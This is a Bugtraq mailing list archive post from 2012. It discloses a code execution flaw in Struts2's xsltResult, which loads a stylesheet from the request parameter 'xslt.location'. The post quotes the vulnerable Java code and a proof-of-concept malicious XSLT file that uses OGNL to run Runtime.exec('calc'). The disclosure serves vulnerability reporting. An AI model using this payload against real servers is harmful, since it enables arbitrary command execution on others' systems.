Home page logo

bugtraq logo Bugtraq mailing list archives

struts2 xsltResult Local code execution vulnerability
From: voidloafer () gmail com
Date: Thu, 22 Mar 2012 08:11:43 GMT

the file:


String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
templates = factory.newTemplates(new StreamSource(resource.openStream()));

A use of the action of xsltResult:
<action name="xslt" class="net.inbreak.xsltAction">
<result type="xslt"/>

An attacker can upload a file:


<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform";
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<h2>hacked by kxlzx</h2> 
<xsl:value-of select="ognl:getValue('@Runtime () getRuntime().exec("calc")', '')"/>

open url


then struts2 will execute

ognl:getValue('@Runtime () getRuntime().exec("calc")', '')

  By Date           By Thread  

Current thread:
  • struts2 xsltResult Local code execution vulnerability voidloafer (Mar 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]